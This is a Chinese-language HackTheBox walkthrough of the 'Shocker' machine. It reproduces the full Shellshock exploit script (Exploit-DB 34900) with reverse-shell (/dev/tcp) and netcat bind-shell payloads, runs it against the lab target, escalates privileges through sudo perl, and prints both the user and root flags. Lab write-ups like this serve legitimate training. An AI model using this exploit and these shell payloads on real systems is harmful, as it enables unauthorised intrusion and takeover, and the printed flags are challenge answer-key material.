目录
连接至HTB服务器并启动靶机
1.How many TCP ports are listening on Shocker?
使用nmap对靶机TCP端口进行开放扫描
2.What is the name of the directory available on the webserver that is a standard name known for running scripts via the Common Gateway Interface?
使用nmap对靶机80、2222端口进行脚本、服务信息扫描
使用浏览器直接访问靶机80端口
使用ffuf对靶机进行路径FUZZ
3.What is the name of the script in the cgi-bin directory?
继续使用ffuf对该目录进行文件扫描
4.Optional question: The output from user.sh matches the output from what standard Linux command?
5.What 2014 CVE ID describes a remote code execution vulnerability in Bash when invoked through Apache CGI?
使用searchsploit搜索关键词
查看该EXP代码
6.What user is the webserver running as on Shocker?
使用python运行该EXP脚本
7.Submit the flag located in the shelly user's home directory.
USER_FLAG:247db5ad8edaf851b335894b3331607f
8.Which binary can the shelly user can run as root on Shocker?
查看该用户可特权运行的命令
9.Submit the flag located in root's home directory.
直接到GTFOBins查询相关提权命令
ROOT_FLAG:0197a11120606d77dc7881331357decb
连接至HTB服务器并启动靶机
靶机IP:10.10.10.56
分配IP:10.10.14.12
1.How many TCP ports are listening on Shocker?
使用nmap对靶机TCP端口进行开放扫描
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.56
由扫描结果可见,靶机开放端口:80、2222共2个端口
2.What is the name of the directory available on the webserver that is a standard name known for running scripts via the Common Gateway Interface?
使用nmap对靶机80、2222端口进行脚本、服务信息扫描
nmap -p 80,2222 -sCV 10.10.10.56
使用浏览器直接访问靶机80端口
可以看到页面就是纯纯的静态HTML,而且技术栈也是相当干净
使用ffuf对靶机进行路径FUZZ
ffuf -u http://10.10.10.56/FUZZ -w ../dictionary/common.txt
上面扫到了一个目录cgi-bin
3.What is the name of the script in the cgi-bin directory?
继续使用ffuf对该目录进行文件扫描
ffuf -u http://10.10.10.56/cgi-bin/FUZZ -w ../dictionary/common.txt -e .php,.py,.bak,.sh
将user.sh下载到本地
wget http://10.10.10.56/cgi-bin/user.sh -O user.sh查看user.sh内容
cat user.shContent-Type: text/plain
Just an uptime test script
08:48:37 up 1:11, 0 users, load average: 0.00, 0.00, 0.00
4.Optional question: The output from user.sh matches the output from what standard Linux command?
直接运行user.sh所输出的内容,与uptime标准输出格式一致
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# uptime
09:16:20 up 13:42, 3 users, load average: 0.07, 0.07, 0.06
5.What 2014 CVE ID describes a remote code execution vulnerability in Bash when invoked through Apache CGI?
通过前面Wappalyzer插件可知靶机使用Apache 2.4.18
使用searchsploit搜索关键词
searchsploit Apache cgi
取出Shellshock相关描述的EXP到当前目录下
searchsploit -m 34900.py┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 34900.py
Exploit: Apache mod_cgi - 'Shellshock' Remote Command Injection
URL: https://www.exploit-db.com/exploits/34900
Path: /usr/share/exploitdb/exploits/linux/remote/34900.py
Codes: CVE-2014-6278, CVE-2014-6271
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/34900.py
由输出可知,该EXP基于漏洞:CVE-2014-6271
查看该EXP代码
cat 34900.py#!/usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys
stop = False
proxyhost = ""
proxyport = 0
def usage():
print """
Shellshock apache mod_cgi remote exploit
Usage:
./exploit.py var=<value>
Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages: specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy
Payloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)
Example:
./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234
Credits:
Federico Galatolo 2014
"""
sys.exit(0)
def exploit(lhost,lport,rhost,rport,payload,pages):
headers = {"Cookie": payload, "Referer": payload}
for page in pages:
if stop:
return
print "[-] Trying exploit on : "+page
if proxyhost != "":
c = httplib.HTTPConnection(proxyhost,proxyport)
c.request("GET","http://"+rhost+page,headers=headers)
res = c.getresponse()
else:
c = httplib.HTTPConnection(rhost)
c.request("GET",page,headers=headers)
res = c.getresponse()
if res.status == 404:
print "[*] 404 on : "+page
time.sleep(1)
args = {}
for arg in sys.argv[1:]:
ar = arg.split("=")
args[ar[0]] = ar[1]
try:
args['payload']
except:
usage()
if args['payload'] == 'reverse':
try:
lhost = args['lhost']
lport = int(args['lport'])
rhost = args['rhost']
payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
except:
usage()
elif args['payload'] == 'bind':
try:
rhost = args['rhost']
rport = args['rport']
payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
except:
usage()
else:
print "[*] Unsupported payload"
usage()
try:
pages = args['pages'].split(",")
except:
pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]
try:
proxyhost,proxyport = args['proxy'].split(":")
except:
pass
if args['payload'] == 'reverse':
serversocket = socket(AF_INET, SOCK_STREAM)
buff = 1024
addr = (lhost, lport)
serversocket.bind(addr)
serversocket.listen(10)
print "[!] Started reverse shell handler"
thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':
serversocket = socket(AF_INET, SOCK_STREAM)
addr = (rhost,int(rport))
thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
buff = 1024
while True:
if args['payload'] == 'reverse':
clientsocket, clientaddr = serversocket.accept()
print "[!] Successfully exploited"
print "[!] Incoming connection from "+clientaddr[0]
stop = True
clientsocket.settimeout(3)
while True:
reply = raw_input(clientaddr[0]+"> ")
clientsocket.sendall(reply+"\n")
try:
data = clientsocket.recv(buff)
print data
except:
pass
if args['payload'] == 'bind':
try:
serversocket = socket(AF_INET, SOCK_STREAM)
time.sleep(1)
serversocket.connect(addr)
print "[!] Successfully exploited"
print "[!] Connected to "+rhost
stop = True
serversocket.settimeout(3)
while True:
reply = raw_input(rhost+"> ")
serversocket.sendall(reply+"\n")
data = serversocket.recv(buff)
print data
except:
pass6.What user is the webserver running as on Shocker?
使用python运行该EXP脚本
python2 34900.py rhost=10.10.10.56 rport=80 lhost=10.10.14.12 lport=1425 pages=/cgi-bin/user.sh payload=reverse┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python2 34900.py rhost=10.10.10.56 rport=80 lhost=10.10.14.12 lport=1425 pages=/cgi-bin/user.sh payload=reverse
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> whoami
shelly
由whoami命令回显可知,当前用户为:shelly
7.Submit the flag located in the shelly user's home directory.
查找user_flag位置并查看其内容
10.10.10.56> find / -name 'user.txt' 2>/dev/null
/home/shelly/user.txt10.10.10.56> cat /home/shelly/user.txt
247db5ad8edaf851b335894b3331607f
USER_FLAG:247db5ad8edaf851b335894b3331607f
8.Which binary can the shelly user can run as root on Shocker?
查看该用户可特权运行的命令
sudo -l10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
可特权运行的文件为:perl
9.Submit the flag located in root's home directory.
直接到GTFOBins查询相关提权命令
sudo /usr/bin/perl -e 'exec "/bin/sh";'10.10.10.56> sudo /usr/bin/perl -e 'exec "/bin/sh";'
whoami
10.10.10.56> root
查找root_flag位置并查看其内容
10.10.10.56> find / -name 'root.txt'
/root/root.txt10.10.10.56> cat /root/root.txt
0197a11120606d77dc7881331357decb